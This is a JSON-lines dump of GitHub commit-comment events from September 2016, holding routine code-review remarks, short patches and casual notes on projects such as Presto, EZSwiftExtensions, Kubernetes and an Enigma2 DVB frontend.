{"id":"4622196581","type":"CommitCommentEvent","actor":{"login":"AdFad666"},"repo":{"name":"Contortrix/device-sony-loire"},"payload":{"comment":{"id":19185711,"position":null,"line":null,"path":null,"commit_id":"edca57dc8ff012a49ca09e2d3c5ef5a52c3e5a46","created_at":"2016-09-27T06:23:35Z","updated_at":"2016-09-27T06:23:35Z","body":"This was merged into common! https://github.com/sonyxperiadev/device-sony-common/commit/6a85db5de4142144a8f7913ba688de2baba81352"}},"created_at":"2016-09-27T06:23:35Z"}
{"id":"4622197415","type":"CommitCommentEvent","actor":{"login":"pnowojski"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19185712,"position":12,"line":96,"path":"presto-main/src/main/java/com/facebook/presto/operator/OperatorContext.java","commit_id":"b1e469442aefe9c9f206d5b02c68b7706525988c","created_at":"2016-09-27T06:23:53Z","updated_at":"2016-09-27T06:23:53Z","body":"if"}},"created_at":"2016-09-27T06:23:53Z"}
{"id":"4622198584","type":"CommitCommentEvent","actor":{"login":"AdFad666"},"repo":{"name":"sonyxperiadev/device-sony-loire"},"payload":{"comment":{"id":19185716,"position":null,"line":null,"path":null,"commit_id":"edca57dc8ff012a49ca09e2d3c5ef5a52c3e5a46","created_at":"2016-09-27T06:24:17Z","updated_at":"2016-09-27T06:24:17Z","body":"This was merged into common! https://github.com/sonyxperiadev/device-sony-common/commit/6a85db5de4142144a8f7913ba688de2baba81352"}},"created_at":"2016-09-27T06:24:17Z"}
{"id":"4622200477","type":"CommitCommentEvent","actor":{"login":"huilin-1995"},"repo":{"name":"huilin-1995/flip"},"payload":{"comment":{"id":19185722,"position":null,"line":null,"path":null,"commit_id":"7b55fbba232f62135ab17d3cf71cca5410c494c9","created_at":"2016-09-27T06:24:54Z","updated_at":"2016-09-27T06:24:54Z","body":"## Hello"}},"created_at":"2016-09-27T06:24:54Z"}
{"id":"4622203103","type":"CommitCommentEvent","actor":{"login":"pnowojski"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19185728,"position":51,"line":382,"path":"presto-main/src/main/java/com/facebook/presto/operator/OperatorContext.java","commit_id":"b1e469442aefe9c9f206d5b02c68b7706525988c","created_at":"2016-09-27T06:25:47Z","updated_at":"2016-09-27T06:25:47Z","body":"hacky..."}},"created_at":"2016-09-27T06:25:47Z"}
{"id":"4622206519","type":"CommitCommentEvent","actor":{"login":"cahirwpz"},"repo":{"name":"cahirwpz/mimiker"},"payload":{"comment":{"id":19185742,"position":null,"line":null,"path":null,"commit_id":"de809280536175a3e0cedf7f700bd204b6500e2d","created_at":"2016-09-27T06:26:53Z","updated_at":"2016-09-27T06:26:53Z","body":"Ok, then. Personally I was leaning towards extended page table. IMHO this will play nice with the fact that lower 4 bits in `C0_CONTEXT` are always 0, cause each pair of PTEs will be 16 bytes long."}},"created_at":"2016-09-27T06:26:53Z"}
{"id":"4622208368","type":"CommitCommentEvent","actor":{"login":"onitake"},"repo":{"name":"onitake/Uranium"},"payload":{"comment":{"id":19185752,"position":null,"line":null,"path":null,"commit_id":"d93728665b83766ea96a2ba89eec2dc3725705c9","created_at":"2016-09-27T06:27:30Z","updated_at":"2016-09-27T06:27:30Z","body":"Thanks for the heads-up!\r\nI'll look into these dependencies once I've sorted the other stuff out."}},"created_at":"2016-09-27T06:27:30Z"}
{"id":"4622212171","type":"CommitCommentEvent","actor":{"login":"memowe"},"repo":{"name":"oscar6echo/GermanyMap"},"payload":{"comment":{"id":19185764,"position":3,"line":3,"path":"LICENSE.txt","commit_id":"bfcf0698ed5734fccabcf10c754702afdf88ecf8","created_at":"2016-09-27T06:28:44Z","updated_at":"2016-09-27T06:28:44Z","body":"Thanks, Olivier, I think you should replace these placeholders by a year and your full name. 👍 "}},"created_at":"2016-09-27T06:28:44Z"}
{"id":"4622213057","type":"CommitCommentEvent","actor":{"login":"JorisVanEijden"},"repo":{"name":"geerlingguy/ansible-role-mysql"},"payload":{"comment":{"id":19185769,"position":null,"line":null,"path":null,"commit_id":"813fa1399046e54ebc58285f217f847a41d18536","created_at":"2016-09-27T06:29:00Z","updated_at":"2016-09-27T06:29:00Z","body":"Thanks for merging. I had also kinda forgotten about it until I ran into it again when provisioning a new host last week."}},"created_at":"2016-09-27T06:29:00Z"}
{"id":"4622214071","type":"CommitCommentEvent","actor":{"login":"cynricshu"},"repo":{"name":"LonerJimmy/BlurBitmap"},"payload":{"comment":{"id":19185771,"position":null,"line":null,"path":null,"commit_id":"c8e7d01a8fccf7e992b555070ca2f23831482db7","created_at":"2016-09-27T06:29:20Z","updated_at":"2016-09-27T06:29:20Z","body":"唔！儿子！666666"}},"created_at":"2016-09-27T06:29:20Z"}
{"id":"4622214107","type":"CommitCommentEvent","actor":{"login":"BlAd373"},"repo":{"name":"BlAd373/hello-world1"},"payload":{"comment":{"id":19185772,"position":null,"line":null,"path":null,"commit_id":"85b32483eacc2d24ace09342b427cf6d7f7b356b","created_at":"2016-09-27T06:29:21Z","updated_at":"2016-09-27T06:29:21Z","body":"# Hello world \r\n\r\nHi humans!\r\n\r\nHubot here, I like Node.js and Coffeescript (that' s what I'm made off).\r\nI've had tacos on the moon and find them far superior to Earth tacos. "}},"created_at":"2016-09-27T06:29:21Z"}
{"id":"4622214837","type":"CommitCommentEvent","actor":{"login":"Yichen-D"},"repo":{"name":"CS2103AUG2016-W09-C2/addressbook-level3"},"payload":{"comment":{"id":19185776,"position":null,"line":null,"path":null,"commit_id":"b9f3e419c6932ac008cdedb36ea82ba02f010c12","created_at":"2016-09-27T06:29:34Z","updated_at":"2016-09-27T06:29:34Z","body":"Note this undo command is only for the most recent step that modified the addressbook(add/delete).\r\nExport command is simply export the file.\r\n"}},"created_at":"2016-09-27T06:29:34Z"}
{"id":"4622217642","type":"CommitCommentEvent","actor":{"login":"qurben"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19185785,"position":null,"line":null,"path":null,"commit_id":"5828a74a313379f129440f08945f3cb9498c864f","created_at":"2016-09-27T06:30:27Z","updated_at":"2016-09-27T06:30:27Z","body":"Mensen konden hun wachtwoord niet resetten omdat token_url niet bestond"}},"created_at":"2016-09-27T06:30:27Z"}
{"id":"4622218253","type":"CommitCommentEvent","actor":{"login":"Manojpkulakarni"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":19185786,"position":63,"line":63,"path":"egov/egov-worksweb/src/main/webapp/WEB-INF/views/contractorbill/contractorBill-refund.jsp","commit_id":"0adaf295c433cdf721f1f5453b6a224dce8fd98a","created_at":"2016-09-27T06:30:37Z","updated_at":"2016-09-27T06:30:37Z","body":"I think checking billDetailsMap == null is unnecessary as you are using the billDetailsMap inside the if statement."}},"created_at":"2016-09-27T06:30:37Z"}
{"id":"4622223584","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19185799,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T06:32:19Z","updated_at":"2016-09-27T06:32:19Z","body":"The real fix is not to trust the type from nim_sockets proc, but instead use DVB API to get current type.\r\n\r\nI had this stashed on my local git, waiting to find some time to complete it. \r\n\r\n```\r\ndiff --git a/lib/dvb/dvb.cpp b/lib/dvb/dvb.cpp\r\nindex 64564d2..cd9e809 100644\r\n--- a/lib/dvb/dvb.cpp\r\n+++ b/lib/dvb/dvb.cpp\r\n@@ -780,6 +780,18 @@ std::string eDVBResourceManager::getFrontendCapabilities(int index)\r\n        return \"\";\r\n }\r\n\r\n+std::string eDVBResourceManager::getFrontendDeliverySystem(int index)\r\n+{\r\n+       for (eSmartPtrList<eDVBRegisteredFrontend>::iterator i(m_frontend.begin()); i != m_frontend.end(); ++i)\r\n+       {\r\n+               if (i->m_frontend->getSlotID() == index)\r\n+               {\r\n+                       return i->m_frontend->getDeliverySystem();\r\n+               }\r\n+       }\r\n+       return \"\";\r\n+}\r\n+\r\n void eDVBResourceManager::setFrontendType(int index, const char *type)\r\n {\r\n        for (eSmartPtrList<eDVBRegisteredFrontend>::iterator i(m_frontend.begin()); i != m_frontend.end(); ++i)\r\ndiff --git a/lib/dvb/dvb.h b/lib/dvb/dvb.h\r\nindex e203f22..958f8f9 100644\r\n--- a/lib/dvb/dvb.h\r\n+++ b/lib/dvb/dvb.h\r\n@@ -243,6 +243,7 @@ public:\r\n        bool frontendIsCompatible(int index, const char *type);\r\n        bool frontendIsMultistream(int index);\r\n        std::string getFrontendCapabilities(int index);\r\n+       std::string getFrontendDeliverySystem(int index);\r\n        void setFrontendType(int index, const char *type);\r\n };\r\n SWIG_TEMPLATE_TYPEDEF(ePtr<eDVBResourceManager>, eDVBResourceManager);\r\ndiff --git a/lib/dvb/frontend.cpp b/lib/dvb/frontend.cpp\r\nindex 880292a..c0bfb64 100644\r\n--- a/lib/dvb/frontend.cpp\r\n+++ b/lib/dvb/frontend.cpp\r\n@@ -2625,6 +2625,38 @@ void eDVBFrontend::setDeliverySystemWhitelist(const std::vector<fe_delivery_syst\r\n        }\r\n }\r\n\r\n+std::string eDVBFrontend::getDeliverySystem()\r\n+{\r\n+       struct dtv_property p[1];\r\n+       p[0].cmd = DTV_DELIVERY_SYSTEM;\r\n+       struct dtv_properties cmdseq;\r\n+       cmdseq.num = 1;\r\n+       cmdseq.props = p;\r\n+\r\n+       if (ioctl(m_fd, FE_GET_PROPERTY, &cmdseq) < 0)\r\n+       {\r\n+               eDebug(\"[eDVBFrontend] getDeliverySystem FE_GET_PROPERTY failed: %m (%d)\", m_type);\r\n+               return \"\";\r\n+       }\r\n+\r\n+       fe_delivery_system_t delsys = (fe_delivery_system_t)p[0].u.data;\r\n+       std::string ds;\r\n+\r\n+       switch (delsys)\r\n+       {\r\n+               case SYS_ATSC:          ds = \"ATSC\"; break;\r\n+               case SYS_DVBC_ANNEX_B:  ds = \"ATSC\"; break;\r\n+               case SYS_DVBS:          ds = \"DVB-S\"; break;\r\n+               case SYS_DVBS2:         ds = \"DVB-S2\"; break;\r\n+               case SYS_DVBT:          ds = \"DVB-T\"; break;\r\n+               case SYS_DVBT2:         ds = \"DVB-T2\"; break;\r\n+               case SYS_DVBC_ANNEX_A:  ds = \"DVB-C\"; break;\r\n+               case SYS_DVBC_ANNEX_C:  ds = \"DVB-C\"; break;\r\n+               default:                ds = \"\"; break;\r\n+       }\r\n+       return ds;\r\n+}\r\n+\r\n bool eDVBFrontend::setDeliverySystem(const char *type)\r\n {\r\n        struct dtv_property p[1];\r\ndiff --git a/lib/dvb/frontend.h b/lib/dvb/frontend.h\r\nindex c23c81e..51d14a5 100644\r\n--- a/lib/dvb/frontend.h\r\n+++ b/lib/dvb/frontend.h\r\n@@ -156,6 +156,7 @@ public:\r\n        static void setPreferredFrontend(int index) { PreferredFrontendIndex = index; }\r\n        static int getPreferredFrontend() { return PreferredFrontendIndex; }\r\n        bool supportsDeliverySystem(const fe_delivery_system_t &sys, bool obeywhitelist);\r\n+       std::string getDeliverySystem();\r\n        void setDeliverySystemWhitelist(const std::vector<fe_delivery_system_t> &whitelist);\r\n        bool setDeliverySystem(const char *type);\r\n```\r\n\r\nCalling `getFrontendDeliverySystem` from python should return the current (valid) type, instead of DVB-C2.\r\n"}},"created_at":"2016-09-27T06:32:19Z"}
{"id":"4622224806","type":"CommitCommentEvent","actor":{"login":"haimav"},"repo":{"name":"xdata-skylark/libskylark"},"payload":{"comment":{"id":19185805,"position":null,"line":null,"path":null,"commit_id":"b8b4c13369d79ab7a586d24a089bc44184cf4ae6","created_at":"2016-09-27T06:32:43Z","updated_at":"2016-09-27T06:32:43Z","body":"OK, good to know! That will be very useful! Just waiting for the official release... :-)"}},"created_at":"2016-09-27T06:32:43Z"}
{"id":"4622232487","type":"CommitCommentEvent","actor":{"login":"alexandr-san4ez"},"repo":{"name":"cmderdev/cmder"},"payload":{"comment":{"id":19185820,"position":null,"line":null,"path":null,"commit_id":"9c0ad9fd8139809f612a73d8a51d840be05794ea","created_at":"2016-09-27T06:35:13Z","updated_at":"2016-09-27T06:35:13Z","body":"@Stanzilla I replaced this function to the next. To me it helped.\r\n```lua\r\nfunction get_git_status()\r\n    local file = io.popen(\"git status --no-lock-index --porcelain 2>nul\")\r\n    for line in file:lines() do\r\n        file:close()\r\n        return false\r\n    end\r\n    file:close()\r\n    return true\r\nend\r\n```"}},"created_at":"2016-09-27T06:35:13Z"}
{"id":"4622241490","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19185842,"position":null,"line":null,"path":null,"commit_id":"9d4d240a2efad70e6768300cfb2b228494ab1d7d","created_at":"2016-09-27T06:38:07Z","updated_at":"2016-09-27T06:38:07Z","body":"А-а-а-а-а!\r\nВолосы не надо было."}},"created_at":"2016-09-27T06:38:07Z"}
{"id":"4622247029","type":"CommitCommentEvent","actor":{"login":"hnomkeng"},"repo":{"name":"mrpond/ROEXEOpenkore"},"payload":{"comment":{"id":19185855,"position":null,"line":null,"path":null,"commit_id":"f170c870321f1365e1a5633f6f80c657887755ba","created_at":"2016-09-27T06:39:50Z","updated_at":"2016-09-27T06:39:50Z","body":"มี 0.5 ซะด้วย"}},"created_at":"2016-09-27T06:39:50Z"}
{"id":"4622247193","type":"CommitCommentEvent","actor":{"login":"chanjames"},"repo":{"name":"chanjames/hello-world-2"},"payload":{"comment":{"id":19185856,"position":1,"line":1,"path":"README.md","commit_id":"eca95c49ac07a2fe837443b0815480eba658f7d6","created_at":"2016-09-27T06:39:53Z","updated_at":"2016-09-27T06:39:53Z","body":"The is the modified version of Hello world"}},"created_at":"2016-09-27T06:39:53Z"}
{"id":"4622249248","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19185860,"position":null,"line":null,"path":null,"commit_id":"9d4d240a2efad70e6768300cfb2b228494ab1d7d","created_at":"2016-09-27T06:40:30Z","updated_at":"2016-09-27T06:40:30Z","body":"Хотя. Не проблема, просто этот файл больше не используется."}},"created_at":"2016-09-27T06:40:30Z"}
{"id":"4622250215","type":"CommitCommentEvent","actor":{"login":"TeslaRus"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19185862,"position":null,"line":null,"path":null,"commit_id":"8d44a30b433706b1f753057e7cd2db75269a3fae","created_at":"2016-09-27T06:40:48Z","updated_at":"2016-09-27T06:40:48Z","body":"commits working should be tested before merging to head.\r\nread_bitu8(src) / 255.0f; -> (float)read_bitu8(src) / 255.0f; // rounding trouble\r\nroom.light_colour.b - b type?"}},"created_at":"2016-09-27T06:40:48Z"}
{"id":"4622250945","type":"CommitCommentEvent","actor":{"login":"singhpri"},"repo":{"name":"nagarkar/plasticsandpcbs"},"payload":{"comment":{"id":19185863,"position":null,"line":null,"path":null,"commit_id":"a38d17d7d613e6c44c8d9d76fa04af07c274c9ff","created_at":"2016-09-27T06:41:01Z","updated_at":"2016-09-27T06:41:01Z","body":"I have deleted app1 and renamed newapp as \"physicians-review\".  Renamed the components and added a local gitignore file as well.  Please review and give feedback."}},"created_at":"2016-09-27T06:41:01Z"}
{"id":"4622252734","type":"CommitCommentEvent","actor":{"login":"Brotter"},"repo":{"name":"Brotter/A3ImpulseResponse"},"payload":{"comment":{"id":19185866,"position":61,"line":293,"path":"tfUtils.py","commit_id":"3bdf13dd93e30a2d3ed43c690ce4632aba38937f","created_at":"2016-09-27T06:41:35Z","updated_at":"2016-09-27T06:41:35Z","body":"This is like such a huge typo that has been annoying me for so long"}},"created_at":"2016-09-27T06:41:35Z"}
{"id":"4622257210","type":"CommitCommentEvent","actor":{"login":"pnowojski"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19185872,"position":45,"line":443,"path":"presto-main/src/main/java/com/facebook/presto/execution/SqlTaskManager.java","commit_id":"726f2fadcfb874fa52faa2d5995bd9d9c62f68ba","created_at":"2016-09-27T06:42:59Z","updated_at":"2016-09-27T06:42:59Z","body":"change this to something like that:\r\n```\r\nremainingBytesToRevoke.addAndGet(-getMemoryAlreadyBeingRevoked())\r\n```\r\nit would be easier to understand"}},"created_at":"2016-09-27T06:42:59Z"}
{"id":"4622258011","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185874,"position":18,"line":18,"path":"Sources/NSDateExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:43:14Z","updated_at":"2016-09-27T06:43:14Z","body":"If this is returning nil, do we have to init it?"}},"created_at":"2016-09-27T06:43:14Z"}
{"id":"4622258066","type":"CommitCommentEvent","actor":{"login":"cludowici"},"repo":{"name":"alexholcombe/dot-jump"},"payload":{"comment":{"id":19185875,"position":146,"line":308,"path":"dot-jump.py","commit_id":"76cdaaf55b034846b87f882d5adda1d14c96ea12","created_at":"2016-09-27T06:43:15Z","updated_at":"2016-09-27T06:43:15Z","body":"Looks like 'quit' is a Python constant. I'll change this"}},"created_at":"2016-09-27T06:43:15Z"}
{"id":"4622259108","type":"CommitCommentEvent","actor":{"login":"tomhukins"},"repo":{"name":"moznion/Perl-Lint"},"payload":{"comment":{"id":19185878,"position":4,"line":860,"path":"t/Policy/Variables/require_localized_punctuation_vars.t","commit_id":"c3f71510a187c492fb9f45770ea3393755b53f24","created_at":"2016-09-27T06:43:34Z","updated_at":"2016-09-27T06:43:34Z","body":"All the changes to this file back out the test fixes I committed in 32a6117fcf5d8"}},"created_at":"2016-09-27T06:43:34Z"}
{"id":"4622259447","type":"CommitCommentEvent","actor":{"login":"sexcstella"},"repo":{"name":"sexcstella/salazar2103"},"payload":{"comment":{"id":19185879,"position":null,"line":null,"path":null,"commit_id":"20f0b0bc150b3bf556741fc14b44523b6b070a4c","created_at":"2016-09-27T06:43:40Z","updated_at":"2016-09-27T06:43:40Z","body":"bolbol ka"}},"created_at":"2016-09-27T06:43:40Z"}
{"id":"4622259470","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19185880,"position":122,"line":120,"path":"squelette/js/ch04-05_BlueTriangles.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-27T06:43:41Z","updated_at":"2016-09-27T06:43:41Z","body":"What's so neat about not putting a ';' ?\r\nI'm refactoring that code right now, I copied it from Gobron's exemple just to provide the perspective feature to the reste of the class. I learned that refactoring is key when copying code from his exemples."}},"created_at":"2016-09-27T06:43:41Z"}
{"id":"4622261591","type":"CommitCommentEvent","actor":{"login":"SarahSauer"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19185882,"position":null,"line":null,"path":null,"commit_id":"df927f1d74fc319ac13d912beaa8675efa7de275","created_at":"2016-09-27T06:44:20Z","updated_at":"2016-09-27T06:44:20Z","body":"Mir gefällt auch das hell auf dunkel besser."}},"created_at":"2016-09-27T06:44:20Z"}
{"id":"4622262029","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185884,"position":140,"line":118,"path":"Sources/NSDateExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:44:27Z","updated_at":"2016-09-27T06:44:27Z","body":"Why are these deleted? Are they the standard now?"}},"created_at":"2016-09-27T06:44:27Z"}
{"id":"4622263739","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19185887,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T06:45:00Z","updated_at":"2016-09-27T06:45:00Z","body":":) "}},"created_at":"2016-09-27T06:45:00Z"}
{"id":"4622265050","type":"CommitCommentEvent","actor":{"login":"sexcstella"},"repo":{"name":"Nianic/Nicart_IT2103"},"payload":{"comment":{"id":19185890,"position":null,"line":null,"path":null,"commit_id":"93aa7490107286daf403c787a9531b3412c24c62","created_at":"2016-09-27T06:45:24Z","updated_at":"2016-09-27T06:45:24Z","body":"bolbol ka nicart"}},"created_at":"2016-09-27T06:45:24Z"}
{"id":"4622265308","type":"CommitCommentEvent","actor":{"login":"tobli"},"repo":{"name":"sitespeedio/pagexray"},"payload":{"comment":{"id":19185891,"position":4,"line":27,"path":"lib/statistics.js","commit_id":"9e372d6cd64be7a14b2b1806aafd0379f5c59551","created_at":"2016-09-27T06:45:28Z","updated_at":"2016-09-27T06:45:28Z","body":"Sorry, don't have an example that triggered this. Should have included an issue reference or a test case. The check for NaN is to catch when no data has been added (so any statistic is invalid, and would just include NaNs). Looking at the code this can only happen for lastModified, since that is conditionally added to the stats. So that's the only field that's optional in the output."}},"created_at":"2016-09-27T06:45:28Z"}
{"id":"4622266051","type":"CommitCommentEvent","actor":{"login":"S-mardii"},"repo":{"name":"OpenDevelopmentMekong/wp-odm_theme"},"payload":{"comment":{"id":19185892,"position":4,"line":55,"path":"less/_mobile.less","commit_id":"1aa23dfa1866ee4cd1be5b8bb4090c3864e6dd1a","created_at":"2016-09-27T06:45:42Z","updated_at":"2016-09-27T06:45:42Z","body":"@acorbi  I wonder why this part of my code is deleted. Do I have to push it up once again on the same branch?\r\n"}},"created_at":"2016-09-27T06:45:42Z"}
{"id":"4622268478","type":"CommitCommentEvent","actor":{"login":"sexcstella"},"repo":{"name":"ejoshua1412/IT_2103"},"payload":{"comment":{"id":19185895,"position":null,"line":null,"path":null,"commit_id":"0ad725e5ab00ca6482c60f3bfe4506ea8f0decee","created_at":"2016-09-27T06:46:26Z","updated_at":"2016-09-27T06:46:26Z","body":"bolbol ka"}},"created_at":"2016-09-27T06:46:26Z"}
{"id":"4622270335","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185903,"position":140,"line":118,"path":"Sources/NSDateExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:46:59Z","updated_at":"2016-09-27T06:46:59Z","body":"yes, date is now Comparable by Apple"}},"created_at":"2016-09-27T06:46:59Z"}
{"id":"4622275587","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185911,"position":383,"line":315,"path":"Sources/StringExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:48:17Z","updated_at":"2016-09-27T06:48:17Z","body":"Is this no longer useful?"}},"created_at":"2016-09-27T06:48:17Z"}
{"id":"4622276900","type":"CommitCommentEvent","actor":{"login":"cludowici"},"repo":{"name":"alexholcombe/dot-jump"},"payload":{"comment":{"id":19185914,"position":157,"line":319,"path":"dot-jump.py","commit_id":"76cdaaf55b034846b87f882d5adda1d14c96ea12","created_at":"2016-09-27T06:48:41Z","updated_at":"2016-09-27T06:48:41Z","body":"This loop is no good. I think that iterating through the stimuli means that the program will always return the last item in the list as the clicked item. I'll fix it tomorrow. "}},"created_at":"2016-09-27T06:48:41Z"}
{"id":"4622278957","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185922,"position":18,"line":18,"path":"Sources/NSDateExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:49:15Z","updated_at":"2016-09-27T06:49:15Z","body":"@goktugyil we need to check, because it crashed in xcode 7 & swift 2.2, \r\n#122 refer "}},"created_at":"2016-09-27T06:49:15Z"}
{"id":"4622279773","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185924,"position":429,"line":353,"path":"Sources/StringExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:49:32Z","updated_at":"2016-09-27T06:49:32Z","body":"Fix the warning"}},"created_at":"2016-09-27T06:49:32Z"}
{"id":"4622285555","type":"CommitCommentEvent","actor":{"login":"xingliwei"},"repo":{"name":"xingliwei/levyx-commonTemplete"},"payload":{"comment":{"id":19185935,"position":null,"line":null,"path":null,"commit_id":"b60af9cf3cf2f9426f4a70a27c41d5f65d797e86","created_at":"2016-09-27T06:51:11Z","updated_at":"2016-09-27T06:51:11Z","body":"从controller到service再到mapper，测试通过"}},"created_at":"2016-09-27T06:51:11Z"}
{"id":"4622286799","type":"CommitCommentEvent","actor":{"login":"peta15"},"repo":{"name":"hanoiiot/hanoi-test"},"payload":{"comment":{"id":19185941,"position":null,"line":null,"path":null,"commit_id":"1443e827dc76aecc3e772539042081c757ee2b2a","created_at":"2016-09-27T06:51:34Z","updated_at":"2016-09-27T06:51:34Z","body":"hopefully we can make this a component again in the future once things are working so error messages aren't just in login?"}},"created_at":"2016-09-27T06:51:34Z"}
{"id":"4622288133","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185945,"position":75,"line":114,"path":"Sources/UIDeviceExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:51:57Z","updated_at":"2016-09-27T06:51:57Z","body":"add 10"}},"created_at":"2016-09-27T06:51:57Z"}
{"id":"4622288726","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185948,"position":383,"line":315,"path":"Sources/StringExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:52:07Z","updated_at":"2016-09-27T06:52:07Z","body":"@goktugyil If it's uncommented then error is thrown in tests, when I comment then tests still succeed. I think this is by default now"}},"created_at":"2016-09-27T06:52:07Z"}
{"id":"4622290037","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185951,"position":176,"line":200,"path":"Sources/UIDeviceExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:52:27Z","updated_at":"2016-09-27T06:52:27Z","body":"add methods for 10"}},"created_at":"2016-09-27T06:52:27Z"}
{"id":"4622293970","type":"CommitCommentEvent","actor":{"login":"dieechtenilente"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":19185955,"position":23,"line":42,"path":"server/src/database2/ChatMessage.java","commit_id":"e8fe8ad86c81ea7a061c2e2c1f4a0ca2922996a9","created_at":"2016-09-27T06:53:35Z","updated_at":"2016-09-27T06:53:35Z","body":"y u do dis"}},"created_at":"2016-09-27T06:53:35Z"}
{"id":"4622297143","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185962,"position":429,"line":353,"path":"Sources/StringExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:54:30Z","updated_at":"2016-09-27T06:54:30Z","body":"@goktugyil we should add at least strings containing \"1\" or \"0\". But maybe empty string? what about \"yes\"/\"no\"?"}},"created_at":"2016-09-27T06:54:30Z"}
{"id":"4622297931","type":"CommitCommentEvent","actor":{"login":"ngaut"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":19185963,"position":18,"line":54,"path":"store/tikv/gc_worker.go","commit_id":"0d8aff964a0d145884a47bbed2517e71a02ac612","created_at":"2016-09-27T06:54:43Z","updated_at":"2016-09-27T06:54:43Z","body":"s/uuid/desc/"}},"created_at":"2016-09-27T06:54:43Z"}
{"id":"4622298883","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185965,"position":75,"line":114,"path":"Sources/UIDeviceExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:54:59Z","updated_at":"2016-09-27T06:54:59Z","body":"nice catch"}},"created_at":"2016-09-27T06:54:59Z"}
{"id":"4622300138","type":"CommitCommentEvent","actor":{"login":"chakri-nelluri"},"repo":{"name":"MikaelCluseau/kubernetes"},"payload":{"comment":{"id":19185972,"position":14,"line":14,"path":"pkg/volume/flexvolume/api/objects.go","commit_id":"448bded309bc25cd0bfcc4c0e41269ada6480d58","created_at":"2016-09-27T06:55:20Z","updated_at":"2016-09-27T06:55:20Z","body":"Synced with Mikael. This will allow drivers to write their custom mount logic. Mount will mount the volume at a global path, including nfs/cifs, which will then be bind mounted to pods. "}},"created_at":"2016-09-27T06:55:20Z"}
{"id":"4622300913","type":"CommitCommentEvent","actor":{"login":"Apekshasilvan"},"repo":{"name":"amadeusmuc/node-ifttt"},"payload":{"comment":{"id":19185973,"position":null,"line":null,"path":null,"commit_id":"6004507e9ad4b9f247c7ecc7c4882019d42ba926","created_at":"2016-09-27T06:55:34Z","updated_at":"2016-09-27T06:55:34Z","body":"please mail me the example script to create action Field ....\r\nMail id: apeksha@silvanlabs.com"}},"created_at":"2016-09-27T06:55:34Z"}
{"id":"4622302447","type":"CommitCommentEvent","actor":{"login":"chakri-nelluri"},"repo":{"name":"MikaelCluseau/kubernetes"},"payload":{"comment":{"id":19185976,"position":53,"line":53,"path":"pkg/volume/flexvolume/api/objects.go","commit_id":"448bded309bc25cd0bfcc4c0e41269ada6480d58","created_at":"2016-09-27T06:56:02Z","updated_at":"2016-09-27T06:56:02Z","body":"Given we has the support for custom mount.. we don't need to pass the mount path field as part of attachment."}},"created_at":"2016-09-27T06:56:02Z"}
